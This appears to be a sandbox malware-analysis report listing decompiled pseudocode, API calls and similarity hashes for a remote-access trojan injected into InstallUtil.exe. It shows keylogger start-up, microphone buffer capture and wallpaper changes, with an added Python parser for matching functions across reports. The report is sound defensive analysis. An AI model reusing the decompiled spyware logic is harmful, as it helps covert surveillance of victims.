                                                                      							asm("adc ebx, edi");
                                                                      						}
                                                                      						_t111 = _t111 + 1;
                                                                      						_v16 = _v16 + 1;
                                                                      						__eflags = _v16 - _t113;
                                                                      					} while (_v16 != _t113);
                                                                      					goto L12;
                                                                      				} else {
                                                                      					return _a8;
                                                                      				}
                                                                       			}

                                                                       Instruction address column for the listing above (one entry per statement, 0x0043e451 .. 0x0043e5c3, 0x00000000 for statements without an instruction) not reproduced line by line.
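The per-function blocks on this page follow a fixed layout: a `C-Code - Quality: N%` line, the decompiled signature, the listing and its address column, then the `APIs`, `Strings`, `Memory Dump Source`, `Joe Sandbox IDA Plugin`, `Yara matches`, `Similarity` and `Uniqueness` headings that describe that same function (the `ref: 0043E59E` and `ref: 0043E5B3` API entries below point into E0043E445, whose code starts at 0x43e445). The following is an added example, written for this page and not code from Joe Sandbox or from the analysed sample, that parses such blocks into records keyed by Opcode ID / Instruction ID so that functions can be matched across two reports. It assumes exactly the layout seen here; the `SAMPLE` text is copied from this report with the listing shortened, and `OTHER_REPORT` is a constructed second report. Treating an equal Instruction ID as a stronger match than an equal Opcode ID is the example's own choice, not something the report states.

```python
import re
from dataclasses import dataclass, field

# "• Key: value" bullets under Memory Dump Source / Joe Sandbox IDA Plugin / Similarity.
BULLET_FIELDS = {"Source File": "source_file", "Snapshot File": "snapshot_file",
                 "API ID": "api_id", "String ID": "string_id",
                 "API String ID": "api_string_id", "Opcode ID": "opcode_id",
                 "Instruction ID": "instruction_id"}
SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                    "Yara matches", "Similarity", "Uniqueness"}
QUALITY_RE = re.compile(r"C-Code\s*-\s*Quality:\s*(?P<q>\d+)%")           # opens a block
FUNC_RE = re.compile(r"^\s*(?P<name>E[0-9A-Fa-f]{8})\s*\(.*\)\s*\{\s*$")  # signature line
API_REF_RE = re.compile(r"^\s*•\s*(?P<api>\S+)\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
BULLET_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*?)\s*$")


@dataclass
class FunctionRecord:
    name: str = ""
    address: int = 0
    quality: int = -1
    apis: list = field(default_factory=list)   # (API symbol, referencing address)
    source_file: str = ""
    snapshot_file: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""


def parse_report(text):
    """One record per function. A block starts at "C-Code - Quality" and runs
    through the signature, listing, address column and the metadata headings
    for that function, up to the next quality line. Text before the first
    quality line (the tail of a function cut off above) is skipped."""
    records, current, section = [], None, ""
    for line in text.splitlines():
        stripped = line.strip()
        m = QUALITY_RE.search(line)
        if m:
            if current is not None:
                records.append(current)
            current, section = FunctionRecord(quality=int(m.group("q"))), ""
            continue
        if current is None:
            continue
        if stripped in SECTION_HEADINGS:
            section = stripped
            continue
        m = FUNC_RE.match(line)
        if m and not current.name:          # first signature after the quality line
            current.name = m.group("name")
            current.address = int(current.name[1:], 16)
            continue
        if section == "APIs":
            m = API_REF_RE.match(line)
            if m:
                current.apis.append((m.group("api"), int(m.group("ref"), 16)))
            continue
        m = BULLET_RE.match(line)
        if m and m.group("key") in BULLET_FIELDS:
            setattr(current, BULLET_FIELDS[m.group("key")], m.group("value"))
    if current is not None:
        records.append(current)
    return records


def match_functions(report_a, report_b):
    """Pair functions of two reports: equal Instruction ID first, else equal Opcode ID."""
    by_instruction = {r.instruction_id: r for r in report_b if r.instruction_id}
    by_opcode = {r.opcode_id: r for r in report_b if r.opcode_id}
    pairs = []
    for rec in report_a:
        if rec.instruction_id in by_instruction:
            pairs.append((rec, by_instruction[rec.instruction_id], "instruction"))
        elif rec.opcode_id in by_opcode:
            pairs.append((rec, by_opcode[rec.opcode_id], "opcode"))
    return pairs


# Block copied from this report (listing shortened to one statement).
SAMPLE = """\
C-Code - Quality: 88%
    E0043E445(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
        _t69 = E00445D3D(_a4);
    }
0x0043e451
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E59E
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E5B3
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: C$ C
• API String ID: 885266447-660835233
• Opcode ID: 12299c0d31a1e32b64bcbfa084a60165fd947028ff0ed7e447246c73cd1db717
• Instruction ID: c194ee352a8ba9574bb54a844d16d4457d29dbd80075ea9d5bdc892b1ac82eab
Uniqueness Score: -1.00%
C-Code - Quality: 94%
    E0040182A(void* __edx, intOrPtr _a8, intOrPtr _a16) {
"""
# Constructed second report: the same function at another address, dumped from another process.
OTHER_REPORT = SAMPLE.replace("E0043E445(", "E00402F3A(").replace("00000011.", "00000021.")
```

Running `match_functions(parse_report(SAMPLE), parse_report(OTHER_REPORT))` pairs E0043E445 with the relocated E00402F3A on the Instruction ID, while the second, cut-off block (E0040182A, no Similarity data in the sample) stays unmatched rather than matching on an empty identifier.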

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E59E
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E5B3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: C$ C
                                                                      • API String ID: 885266447-660835233
                                                                      • Opcode ID: 12299c0d31a1e32b64bcbfa084a60165fd947028ff0ed7e447246c73cd1db717
                                                                      • Instruction ID: c194ee352a8ba9574bb54a844d16d4457d29dbd80075ea9d5bdc892b1ac82eab
                                                                      • Opcode Fuzzy Hash: 12299c0d31a1e32b64bcbfa084a60165fd947028ff0ed7e447246c73cd1db717
                                                                      • Instruction Fuzzy Hash: BE517371E01108AFCF14DF9AC8849ADBBF2EF88318F19815AE819973A1E775DD51CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                       			// Editor note: waveIn message handler. _a8 is compared with 0x3BE (MM_WIM_OPEN); on open
                                                                       			// the capture-buffer index at 0x46fe4c is reset to 0. As decompiled, the else branch
                                                                       			// tests the same difference again (_t28 != 0 is always true there), so a second message-code
                                                                       			// comparison was presumably folded away; the code below it is the per-buffer path: string
                                                                       			// helpers build a record from _a16 (0x20 chars) and 0x46da98 (0x12 chars), the WAVEHDR
                                                                       			// selected by the index is released with waveInUnprepareHeader and the index advances
                                                                       			// modulo 2 (two alternating capture buffers). When *0x46da74 == 1 the thread instead
                                                                       			// calls ExitThread(0).
                                                                       			E0040182A(void* __edx, intOrPtr _a8, intOrPtr _a16) {
                                                                      				char _v32;
                                                                      				void* _v52;
                                                                      				char _v64;
                                                                      				void* _v76;
                                                                      				char _v96;
                                                                      				void* _v100;
                                                                      				char _v120;
                                                                      				void* _v124;
                                                                      				char _v144;
                                                                      				void* _v148;
                                                                      				char _v168;
                                                                      				void* _v172;
                                                                      				char _v192;
                                                                      				void* _v196;
                                                                      				char _v216;
                                                                      				char _v220;
                                                                      				char _v232;
                                                                      				char _v240;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t28;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      				void* _t34;
                                                                      				void* _t40;
                                                                      				signed int _t59;
                                                                      				void* _t107;
                                                                      				void* _t121;
                                                                      				signed int _t122;
                                                                      				void* _t124;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_t124 = (_t122 & 0xfffffff8) - 0xdc;
                                                                       				// MSVC thread-safe static-initialisation guard: the guard at 0x46fe48 is compared with the
                                                                       				// per-thread initialisation epoch in the module's TLS block (reached via fs:[0x2c]); the body
                                                                       				// constructs the function-local static at 0x46fdc8 and registers E00453CA0 as its destructor.
                                                                       				if( *0x46fe48 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                      					E00430D17(0x46fe48);
                                                                      					_t127 =  *0x46fe48 - 0xffffffff;
                                                                      					if( *0x46fe48 == 0xffffffff) {
                                                                      						E004046B7(0x46fdc8, _t121, 0);
                                                                      						E004310BE(_t127, E00453CA0);
                                                                      						E00430CD8(0x46fe48, 0x46fe48);
                                                                      					}
                                                                      				}
                                                                      				E0040209F(0,  &_v220);
                                                                      				_t28 = _a8 - 0x3be;
                                                                      				if(_t28 == 0) {
                                                                      					L10:
                                                                      					 *0x46fe4c = 0;
                                                                      					goto L11;
                                                                      				} else {
                                                                      					if(_t28 != 0) {
                                                                      						L11:
                                                                      						return E00401F98();
                                                                      					}
                                                                      					_t130 =  *0x46da74 - 1;
                                                                      					if( *0x46da74 != 1) {
                                                                      						_t32 = E00401E25(0x46e0cc, _t107, _t121, _t130,  *0x46fe4c);
                                                                      						_t33 = E00402077(0,  &_v32, _t107, _t121, _t130, _a16, 0x20);
                                                                      						_t34 = E00402077(0,  &_v64, _t107, _t121, _t130, 0x46da98, 0x12);
                                                                      						_t113 = E00402ED0(0,  &_v192, E00402E61( &_v168, E00402ED0(0,  &_v144, E00402E61( &_v120, E00402EF1( &_v96, 0x46e10c, _t121, 0x46e260), _t34), _t121, _t130, 0x46e260), _t33), _t121, _t130, 0x46e260);
                                                                      						_t40 = E00402ED0(0,  &_v216, _t39, _t121, _t130, _t32);
                                                                      						_t13 =  &_v240; // 0x46e260
                                                                      						E00401FA2(_t13, _t39, 0x46e260, _t40);
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						waveInUnprepareHeader( *0x46dab8, ( *0x46fe4c << 5) +  *0x46e108, 0x20);
                                                                      						E004017AC( *0x46fe4c, _t39, _t130);
                                                                      						_t131 =  *0x46fdcc - 0xffffffff;
                                                                      						if( *0x46fdcc == 0xffffffff) {
                                                                      							E00404804(0x46fdc8);
                                                                      							E0040489F(0x46fdc8, 0x46e260, 0x46fdc8);
                                                                      						}
                                                                      						E004020B6(0, _t124 - 0x18, _t113, _t131,  &_v232);
                                                                      						_push(0x61);
                                                                      						E00404A78(0x46fdc8, _t113, _t131);
                                                                      						_t59 =  *0x46fe4c + 1;
                                                                      						 *0x46fe4c = _t59;
                                                                      						if(_t59 < 2) {
                                                                      							goto L11;
                                                                      						} else {
                                                                      							goto L10;
                                                                      						}
                                                                      					}
                                                                      					E00404DFD(_t107);
                                                                      					ExitThread(0);
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 0040187E
                                                                      • ExitThread.KERNEL32 ref: 004018B6
                                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,0046E260,00000000), ref: 004019C4
                                                                        • Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                      • String ID: `F
                                                                      • API String ID: 1649129571-3520748611
                                                                      • Opcode ID: a55d45382636431a70b28e65ff94c6419641bb50a0d313086208a579fb9b6c36
                                                                      • Instruction ID: 2dee2ec2161f66d9b9244a10a6034dac15416112390a30e3df994b068027022e
                                                                      • Opcode Fuzzy Hash: a55d45382636431a70b28e65ff94c6419641bb50a0d313086208a579fb9b6c36
                                                                      • Instruction Fuzzy Hash: 6041F6316042004BC328FB25EC86AAF73A5AB81358F00453FF146A71F2EFB85949CB5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E0043F514(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				void* _v12;
                                                                      				char _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t36;
                                                                      				struct HINSTANCE__* _t37;
                                                                      				struct HINSTANCE__* _t43;
                                                                      				intOrPtr* _t44;
                                                                      				intOrPtr* _t45;
                                                                      				CHAR* _t49;
                                                                      				struct HINSTANCE__* _t50;
                                                                      				void* _t52;
                                                                      				struct HINSTANCE__* _t55;
                                                                      				intOrPtr* _t59;
                                                                      				struct HINSTANCE__* _t64;
                                                                      				intOrPtr _t65;
                                                                      
                                                                      				_t52 = __ecx;
                                                                      				if(_a4 == 2 || _a4 == 1) {
                                                                      					E0044AD49(_t52);
                                                                      					GetModuleFileNameA(0, 0x46d3c8, 0x104);
                                                                      					_t49 =  *0x46da40; // 0x11e34d8
                                                                      					 *0x46da48 = 0x46d3c8;
                                                                      					if(_t49 == 0 ||  *_t49 == 0) {
                                                                      						_t49 = 0x46d3c8;
                                                                      					}
                                                                      					_v8 = 0;
                                                                      					_v16 = 0;
                                                                      					E0043F638(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                      					_t64 = E0043F7AD(_v8, _v16, 1);
                                                                      					if(_t64 != 0) {
                                                                      						E0043F638(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                      						if(_a4 != 1) {
                                                                      							_v12 = 0;
                                                                      							_push( &_v12);
                                                                      							_t50 = E0044A864(_t49, 0, _t64, _t64);
                                                                      							if(_t50 == 0) {
                                                                      								_t59 = _v12;
                                                                      								_t55 = 0;
                                                                      								_t36 = _t59;
                                                                      								if( *_t59 == 0) {
                                                                      									L15:
                                                                      									_t37 = 0;
                                                                      									 *0x46da34 = _t55;
                                                                      									_v12 = 0;
                                                                      									_t50 = 0;
                                                                      									 *0x46da38 = _t59;
                                                                      									L16:
                                                                      									E004427C2(_t37);
                                                                      									_v12 = 0;
                                                                      									goto L17;
                                                                      								} else {
                                                                      									goto L14;
                                                                      								}
                                                                      								do {
                                                                      									L14:
                                                                      									_t36 = _t36 + 4;
                                                                      									_t55 =  &(_t55->i);
                                                                      								} while ( *_t36 != 0);
                                                                      								goto L15;
                                                                      							}
                                                                      							_t37 = _v12;
                                                                      							goto L16;
                                                                      						}
                                                                      						 *0x46da34 = _v8 - 1;
                                                                      						_t43 = _t64;
                                                                      						_t64 = 0;
                                                                      						 *0x46da38 = _t43;
                                                                      						goto L10;
                                                                      					} else {
                                                                      						_t44 = E00439941();
                                                                      						_push(0xc);
                                                                      						_pop(0);
                                                                      						 *_t44 = 0;
                                                                      						L10:
                                                                      						_t50 = 0;
                                                                      						L17:
                                                                      						E004427C2(_t64);
                                                                      						return _t50;
                                                                      					}
                                                                      				} else {
                                                                      					_t45 = E00439941();
                                                                      					_t65 = 0x16;
                                                                      					 *_t45 = _t65;
                                                                      					E0043862C();
                                                                      					return _t65;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000104), ref: 0043F554
                                                                      • _free.LIBCMT ref: 0043F61F
                                                                      • _free.LIBCMT ref: 0043F629
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      • API String ID: 2506810119-2118511638
                                                                      • Opcode ID: 9b9e57fb20614b64aae31c5f69d4271fda5d7d4308588e891ecc6e60cb97c154
                                                                      • Instruction ID: 2d8171768386c24464799b7b69c9a9af3925e8cd910694c6a44d0b6c0c4735b7
                                                                      • Opcode Fuzzy Hash: 9b9e57fb20614b64aae31c5f69d4271fda5d7d4308588e891ecc6e60cb97c154
                                                                      • Instruction Fuzzy Hash: D43193B1E05204BFDB21DF9A998199FBBE8EB98314F10507BF804D7311D6B88E46CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 27%
                                                                      			E00418F13(void* __ecx, void* __edx) {
                                                                      				void* __ebx;
                                                                      				char* _t10;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				void* _t15;
                                                                      				void* _t16;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t28;
                                                                      				void* _t32;
                                                                      				void* _t34;
                                                                      
                                                                      				_t21 = __edx;
                                                                      				_t24 = __edx;
                                                                      				_t12 = __ecx;
                                                                      				if(_t12 == 0) {
                                                                      					_push(1);
                                                                      					_t28 = _t27 - 0x18;
                                                                      					_t10 = "0";
                                                                      					E00402053(_t10, _t28, __edx, _t26, _t10);
                                                                      					_t25 = "Control Panel\\Desktop";
                                                                      					_push("WallpaperStyle");
                                                                      					_t22 = "Control Panel\\Desktop";
                                                                      					E00410CE2(_t28, "Control Panel\\Desktop");
                                                                      					_push(1);
                                                                      					_t14 = _t28 + 0x20 - 0x18;
                                                                      					_push(_t10);
                                                                      					goto L11;
                                                                      				} else {
                                                                      					_t15 = _t12 - 1;
                                                                      					if(_t15 == 0) {
                                                                      						_push(1);
                                                                      						_t32 = _t27 - 0x18;
                                                                      						_t16 = _t32;
                                                                      						_push("2");
                                                                      						goto L7;
                                                                      					} else {
                                                                      						_t17 = _t15 - 1;
                                                                      						if(_t17 == 0) {
                                                                      							_push(1);
                                                                      							_t32 = _t27 - 0x18;
                                                                      							_t16 = _t32;
                                                                      							_push("10");
                                                                      							goto L7;
                                                                      						} else {
                                                                      							_t18 = _t17 - 1;
                                                                      							if(_t18 == 0) {
                                                                      								_push(1);
                                                                      								_t32 = _t27 - 0x18;
                                                                      								_t16 = _t32;
                                                                      								_push("6");
                                                                      								L7:
                                                                      								E00402053(_t10, _t16, _t21, _t26);
                                                                      								_t25 = "Control Panel\\Desktop";
                                                                      								_push("WallpaperStyle");
                                                                      								_t22 = "Control Panel\\Desktop";
                                                                      								E00410CE2(_t16, "Control Panel\\Desktop");
                                                                      								_push(1);
                                                                      								_t14 = _t32 + 0x20 - 0x18;
                                                                      								_push("0");
                                                                      								goto L11;
                                                                      							} else {
                                                                      								if(_t18 == 1) {
                                                                      									_push(1);
                                                                      									_t34 = _t27 - 0x18;
                                                                      									E00402053(_t10, _t34, __edx, _t26, "0");
                                                                      									_t25 = "Control Panel\\Desktop";
                                                                      									_push("WallpaperStyle");
                                                                      									_t22 = "Control Panel\\Desktop";
                                                                      									E00410CE2(_t34, "Control Panel\\Desktop");
                                                                      									_push(1);
                                                                      									_t14 = _t34 + 0x20 - 0x18;
                                                                      									_push("1");
                                                                      									L11:
                                                                      									E00402053(_t10, _t14, _t22, _t26);
                                                                      									E00410CE2(_t14, _t25);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return SystemParametersInfoW(0x14, 0, _t24, 3);
                                                                      			}

                                                                      APIs
                                                                      • SystemParametersInfoW.USER32 ref: 00419008
                                                                        • Part of subcall function 00410CE2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410CF1
                                                                        • Part of subcall function 00410CE2: RegSetValueExA.KERNELBASE(?,00462000,00000000,?,00000000,00000000,0046E5A0,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D19
                                                                        • Part of subcall function 00410CE2: RegCloseKey.KERNELBASE(?,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                      • API String ID: 4127273184-3576401099
                                                                      • Opcode ID: 2dff6032570f7190d019cdeba908e25c71bcbf8c15ac2d7c415868f2eb706b18
                                                                      • Instruction ID: e7745c1b48172c67d7e360463aad66b4cc9f2f7f8c797338d566decf2a162258
                                                                      • Opcode Fuzzy Hash: 2dff6032570f7190d019cdeba908e25c71bcbf8c15ac2d7c415868f2eb706b18
                                                                      • Instruction Fuzzy Hash: 8A119072B8865037D818353E4E1BFAF2C029382B64F64415FF6012A6D6E8DE4AD243DF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E004097F2(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                                                                      				struct _SYSTEMTIME _v20;
                                                                      				char _v44;
                                                                      				char _v68;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				WCHAR* _t28;
                                                                      				void* _t61;
                                                                      				void* _t62;
                                                                      				void* _t64;
                                                                      				void* _t65;
                                                                      				void* _t66;
                                                                      
                                                                      				_t66 = __eflags;
                                                                      				_t61 = __ecx;
                                                                      				GetLocalTime( &_v20);
                                                                      				E00401ED3( &_a4, _t21, _t62, E00402FD4(__ebx,  &_v44, E0040A01F( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_push(0x64 + E0040243C() * 2);
                                                                      				_t28 = E00438691( &_a4);
                                                                      				_push(_v20.wSecond & 0x0000ffff);
                                                                      				_push(_v20.wMinute & 0x0000ffff);
                                                                      				_push(_v20.wHour & 0x0000ffff);
                                                                      				_push(_v20.wDay & 0x0000ffff);
                                                                      				_push(_v20.wMonth & 0x0000ffff);
                                                                      				wsprintfW(_t28, E00401EC4( &_a4));
                                                                      				E0040413E(__ebx, _t65, _t21, _t64, _t28);
                                                                      				E00408D60(_t61, _v20.wYear & 0x0000ffff);
                                                                      				L0043868C(_t28);
                                                                      				return E00401EC9();
                                                                      			}

                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
                                                                      • wsprintfW.USER32 ref: 00409881
                                                                        • Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EventLocalTimewsprintf
                                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                      • API String ID: 1497725170-1359877963
                                                                      • Opcode ID: 61f980347a0de8429949275f94f9ba41580dcfd8d279299a1af9398fa76adad3
                                                                      • Instruction ID: 5c7debe3a55a11437ab77da88efdcb51d5695efab24355448d0721f194ee9547
                                                                      • Opcode Fuzzy Hash: 61f980347a0de8429949275f94f9ba41580dcfd8d279299a1af9398fa76adad3
                                                                      • Instruction Fuzzy Hash: 9C119A725101186AC708FB56EC558FF77BCAE48355B00012FF802661D1EF7C5A86C6AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00409579(void* __ecx, void* __edx) {
                                                                      				char _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t7;
                                                                      				void* _t18;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      
                                                                      				_t31 = __ecx;
                                                                      				_t38 =  *((char*)(__ecx + 0x4a));
                                                                      				if( *((char*)(__ecx + 0x4a)) == 0) {
                                                                      					 *((char*)(__ecx + 0x4a)) = 1;
                                                                      					E00402053(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
                                                                      					_t34 = _t33 - 0x18;
                                                                      					E00418385(_t33 - 0x18,  &_v28);
                                                                      					E004097F2(_t18, _t31, _t38);
                                                                      					E00401F98();
                                                                      					E00402053(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
                                                                      					E00402053(_t18, _t34,  &_v28, _t32, "i");
                                                                      					E00417D02(_t18, "Online Keylogger Started");
                                                                      					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
                                                                      						if( *_t31 == 0) {
                                                                      							CreateThread(0, 0, E00408A21, _t31, 0, 0);
                                                                      						}
                                                                      						CreateThread(0, 0, E00408A43, _t31, 0, 0);
                                                                      					}
                                                                      					return CreateThread(0, 0, E00408A4F, _t31, 0, 0);
                                                                      				}
                                                                      				return _t7;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
                                                                        • Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      • CreateThread.KERNEL32 ref: 004095F9
                                                                      • CreateThread.KERNEL32 ref: 00409605
                                                                      • CreateThread.KERNEL32 ref: 00409611
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                                      • String ID: Online Keylogger Started
                                                                      • API String ID: 112202259-1258561607
                                                                      • Opcode ID: e2a93841264675db23c2ea1d6ea455b36c5ce47d7530236e1a6bbff3732667af
                                                                      • Instruction ID: ddcc4882a412459d5fea0c8e021e8693bc3a835cc6765f9535291a0227f72f0e
                                                                      • Opcode Fuzzy Hash: e2a93841264675db23c2ea1d6ea455b36c5ce47d7530236e1a6bbff3732667af
                                                                      • Instruction Fuzzy Hash: E701A5A17042183AEA2076669C86DBF7A2DCA82398B40047FF541226C3D9B91C4586FA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00405133() {
                                                                      				void* __ebx;
                                                                      				void* __ecx;
                                                                      				long _t19;
                                                                      				void* _t24;
                                                                      				intOrPtr _t28;
                                                                      				void* _t29;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      				intOrPtr _t40;
                                                                      
                                                                      				_t31 = _t24;
                                                                      				 *((intOrPtr*)(_t31 + 0x78)) = 0;
                                                                      				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
                                                                      					L3:
                                                                      					 *((char*)(_t31 + 0x5c)) = 0;
                                                                      					_t40 =  *0x46dd00; // 0x0
                                                                      					if(_t40 != 0) {
                                                                      						_t34 = _t33 - 0x18;
                                                                      						E00402053(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
                                                                      						E00402053(0, _t34 - 0x18, _t29, _t32, "E");
                                                                      						E00417D02(0, _t30);
                                                                      					}
                                                                      					E00404DFD(_t29);
                                                                      					return 1;
                                                                      				} else {
                                                                      					goto L1;
                                                                      				}
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
                                                                      					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
                                                                      					_t28 =  *((intOrPtr*)(_t31 + 0x78));
                                                                      					if(_t19 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L3;
                                                                      				}
                                                                      				CloseHandle( *(_t31 + 0x60));
                                                                      				 *(_t31 + 0x60) = 0;
                                                                      				 *((char*)(_t31 + 0x5c)) = 0;
                                                                      				SetEvent( *(_t31 + 0x64));
                                                                      				return 0;
                                                                      			}

APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405130), ref: 0040514A
• CloseHandle.KERNEL32(?), ref: 004051A1
• SetEvent.KERNEL32(?), ref: 004051B0
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: e2cd3d883d8a6469c3c95d2af252fb402bfecd5877f52b3bff7841f152166546
